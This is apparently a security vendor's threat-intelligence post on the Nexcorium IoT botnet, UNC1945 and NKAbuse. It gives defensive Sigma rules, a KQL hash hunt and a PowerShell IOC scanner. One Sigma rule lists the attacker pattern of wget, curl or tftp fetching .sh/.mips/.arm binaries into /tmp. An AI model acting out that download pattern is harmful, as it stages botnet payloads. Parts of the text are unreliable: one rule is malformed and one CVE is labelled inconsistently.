Back to Intelligence

Nexcorium IoT Botnet, UNC1945 Financial Threats, and NKAbuse Supply Chain: OTX Pulse Analysis — Enterprise Detection Pack

SA
Security Arsenal Team
May 18, 2026
5 min read

Threat Summary

Current OTX pulses indicate a surge in diverse threat activities ranging from IoT exploitation to sophisticated supply-chain attacks. The Nexcorium campaign (a Mirai variant) is aggressively targeting IoT devices, specifically TBK DVRs, leveraging CVE-2024-3721 to build a DDoS botnet. Simultaneously, the UNC1945 (LightBasin) actor continues to target the financial sector via Managed Service Providers (MSPs), utilizing exploits for Oracle Solaris and Windows (CVE-2020-14871, CVE-2019-0708). Additionally, a new supply-chain vector has emerged involving the NKAbuse malware family, which exploits a critical vulnerability (CVE-2026-39987) in the Marimo Python notebook platform to deliver blockchain-based botnet malware via HuggingFace Spaces.

Threat Actor / Malware Profile

Nexus Team (Nexcorium)

  • Type: IoT Botnet Operator
  • Malware: Nexcorium (Mirai Variant)
  • Distribution: Exploits CVE-2024-3721 (OS Command Injection) in TBK DVR devices. Uses credential brute-force for lateral movement.
  • Payload: Multi-architecture binaries (ARM, MIPS, x86-64) designed for Linux/IoT environments.
  • Behavior: Establishes persistence via init configurations and cron jobs. Primary objective is DDoS attack capability.

UNC1945 (LightBasin)

  • Type: Advanced Persistent Threat (APT)
  • Target: Finance and Consulting via MSPs
  • Malware: SLAPSTICK, EVILSUN, LEMONSTICK, STEELCORGI, LOGBLEACH.
  • Distribution: Third-party compromise (MSPs), exploitation of CVE-2020-14871 (Oracle WebLogic) and CVE-2019-0708 (BlueKeep).
  • Behavior: Uses custom VMs pre-loaded with tools to evade detection. Capable of operating across Solaris, Windows, and Linux.

Unknown (NKAbuse/kagent)

  • Type: Botnet / Crypto-abuse
  • Malware: NKAbuse
  • Distribution: Typosquatted HuggingFace Spaces exploiting CVE-2026-39987 (Marimo RCE).
  • C2: NKN Blockchain
  • Behavior: Delivered via malicious Python notebook execution. Uses blockchain infrastructure for command and control to obfuscate traffic.

IOC Analysis

The provided indicators consist primarily of file hashes (MD5, SHA1, SHA256) and CVE references.

  • File Hashes: Multiple hashes for Nexcorium (IoT binaries), UNC1945 tools (Solaris/Windows payloads), and NKAbuse (Python/scripts). These should be loaded into EDR solutions to immediately quarantine matching files.
  • CVEs:
    • CVE-2024-3721: Critical for IoT/Edge security teams to patch TBK DVRs.
    • CVE-2026-39987: Critical for DevOps teams using Marimo notebooks.
    • CVE-2020-14871 / CVE-2019-0708: Legacy vulnerabilities requiring patching on exposed Oracle and Windows systems.

SOC teams should operationalize these by creating watchlists in SIEMs for the hashes and configuring vulnerability scanners to flag the specific CVEs.

Detection Engineering

Sigma Rules

YAML
---
title: Potential Nexcorium Mirai Variant Botnet Activity
description: Detects behavior associated with the Nexcorium Mirai variant including command injection exploitation patterns and downloading of multi-architecture binaries to /tmp.
references:
    - https://www.fortinet.com/blog/threat-research/tracking-mirai-variant-nexcorium-a-vulnerability-driven-iot-botnet-campaign
author: Security Arsenal
date: 2026/05/18
tags:
    - attack.initial_access
    - attack.execution
    - attack.t1059.004
logsource:
    product: linux
    service: auditd
detection:
    selection_exploit:
        cmdline|contains:
            - '/dvrdvs/sdk'
            - 'TBK DVR'
    selection_download:
        process.name|contains:
            - 'wget'
            - 'curl'
            - 'tftp'
        cmdline|contains:
            - '/tmp/'
            - '/dev/shm/'
        cmdline|endswith:
            - '.sh'
            - '.mips'
            - '.arm'
    condition: 1 of selection_*
falsepositives:
    - Legitimate administration of IoT devices
level: high
---
title: UNC1945 Suspicious Process Execution on Solaris/Linux
description: Detects execution of suspicious binaries or scripts associated with UNC1945 activity, including custom backdoors and exploitation tools.
references:
    - https://cloud.google.com/blog/topics/threat-intelligence/live-off-the-land-an-overview-of-unc1945
author: Security Arsenal
date: 2026/05/18
tags:
    - attack.defense_evasion
    - attack.t1124
logsource:
    product: linux
    category: process_creation
detection:
    selection_image:
        image|endswith:
            - '/slapstick'
            - '/evilsun'
            - '/lemonstick'
    selection_suspicious_parent:
        parent.image|contains:
            - '/java'
            - '/weblogic'
        image|endswith:
            - '/sh'
            - '/bash'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: critical
---
title: NKAbuse Blockchain C2 via Python RCE
description: Detects potential exploitation of Marimo or similar Python RCE leading to NKAbuse malware communicating with NKN blockchain or external IPs.
references:
    - https://www.sysdig.com/blog/cve-2026-39987-update-how-attackers-weaponized-marimo-to-deploy-a-blockchain-botnet-via-huggingface
author: Security Arsenal
date: 2026/05/18
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    product: linux
    category: network_connection
detection:
    selection_python:
    process.name|contains:
        - 'python'
        - 'python3'
    destination.port:
        - 443
        - 80
    destination.ip|cidr:
        - '0.0.0.0/0' # Broad check, requires alert tuning
    filter_legit:
        destination.domain|endswith:
            - 'huggingface.co'
            - 'pypi.org'
    condition: selection_python and not filter_legit
falsepositives:
    - Legitimate Python outbound traffic
level: medium

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for Nexcorium and UNC1945 File Hashes
let IoCs = dynamic([
    "aaed4dca8bd6bb42fc4efb358a02a554", "89dae116c77b0035277d39dfe01043624427c119ddee8883a3ba54a42a6ae400",
    "353874dd1e12a7f67ba4f7ecbcbcb2af", "0b510f93f47590791626d2fa74ddd62ba6eb8a5a5bb7b8476c0ceffc7be94ebe",
    "6983f7001de10f4d19fc2d794c3eb534", "d505533ae75f89f98554765aaf2a330a",
    "2eff2273d423a7ae6c68e3ddd96604bc", "0845835e18a3ed4057498250d30a11b1",
    "abaf1d04982449e0f7ee8a34577fe8af", "632be2363c7a13be6d5ce0dca11e387bd0a072cc962b004f0dcf3c1f78982a5a",
    "1d36de06a6240919189cb46e0bcccc3c", "bdcb5867f73beae89c3fce46ad5185be",
    "25e4b2c4bb37f125b693a9c57b0e743eab2a3d98234f7519cd389e788252fd13", "27c62a041cc3c88df60dfceb50aa5f2217e1ac2ef9e796d7369e9e1be52ebb64"
]);
DeviceFileEvents
| where SHA256 in IoCs or MD5 in IoCs or SHA1 in IoCs
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessAccountName
| extend AlertMessage = "Malicious File Hash Detected based on OTX Pulse"

PowerShell Hunt Script

PowerShell
# IOC Hunt Script for Nexcorium, UNC1945, and NKAbuse
# Requires Admin privileges

$MD5Hashes = @(
    "aaed4dca8bd6bb42fc4efb358a02a554", "353874dd1e12a7f67ba4f7ecbcbcb2af",
    "6983f7001de10f4d19fc2d794c3eb534", "d505533ae75f89f98554765aaf2a330a",
    "2eff2273d423a7ae6c68e3ddd96604bc", "0845835e18a3ed4057498250d30a11b1",
    "abaf1d04982449e0f7ee8a34577fe8af", "1d36de06a6240919189cb46e0bcccc3c",
    "bdcb5867f73beae89c3fce46ad5185be"
)

$SHA256Hashes = @(
    "89dae116c77b0035277d39dfe01043624427c119ddee8883a3ba54a42a6ae400",
    "0b510f93f47590791626d2fa74ddd62ba6eb8a5a5bb7b8476c0ceffc7be94ebe",
    "632be2363c7a13be6d5ce0dca11e387bd0a072cc962b004f0dcf3c1f78982a5a",
    "25e4b2c4bb37f125b693a9c57b0e743eab2a3d98234f7519cd389e788252fd13",
    "27c62a041cc3c88df60dfceb50aa5f2217e1ac2ef9e796d7369e9e1be52ebb64"
)

Write-Host "[+] Scanning C: drive for known malicious IoCs..." -ForegroundColor Cyan

# Scan C drive
$files = Get-ChildItem -Path "C:\" -Recurse -ErrorAction SilentlyContinue -File

foreach ($file in $files) {
    $hash = Get-FileHash -Path $file.FullName -Algorithm MD5 -ErrorAction SilentlyContinue
    if ($hash.Hash -in $MD5Hashes) {
        Write-Host "[ALERT] MD5 Match found: $($file.FullName)" -ForegroundColor Red
    }
    
    $hash256 = Get-FileHash -Path $file.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue
    if ($hash256.Hash -in $SHA256Hashes) {
        Write-Host "[ALERT] SHA256 Match found: $($file.FullName)" -ForegroundColor Red
    }
}

# Check for suspicious Marimo/Notebook directories (Supply Chain Check)
$pathsToCheck = @("C:\Users\*\AppData\Local", "C:\ProgramData")
Write-Host "[+] Checking for suspicious python/marimo directories..." -ForegroundColor Cyan
foreach ($path in $pathsToCheck) {
    if (Test-Path $path) {
        Get-ChildItem -Path $path -Directory -Filter "*marimo*" -ErrorAction SilentlyContinue | ForEach-Object {
            Write-Host "[INFO] Found Marimo directory: $($_.FullName)" -ForegroundColor Yellow
        }
    }
}

Response Priorities

  • Immediate:
    • Block all file hashes listed in the IOC Analysis on endpoints and gateways.
    • Patch CVE-2026-39987 (Marimo) and CVE-2024-3721 (TBK DVR) immediately if affected systems exist.
    • Block access to known typosquatted HuggingFace Spaces domains identified in threat intel.
  • 24 Hours:
    • Hunt for signs of NKAbuse (suspicious Python processes connecting to blockchain IPs or non-standard ports).
    • Audit Managed Service Provider (MSP) connections and logs for UNC1945 activity (EVILSUN/SLAPSTICK).
  • 1 Week:
    • Review and harden IoT device segmentation to prevent Nexcorium botnet propagation.
    • Conduct a thorough review of Oracle Solaris and WebLogic servers for UNC1945 persistence mechanisms.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-malwarenexcoriumunc1945nkabuseiot-botnetapt-finance

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action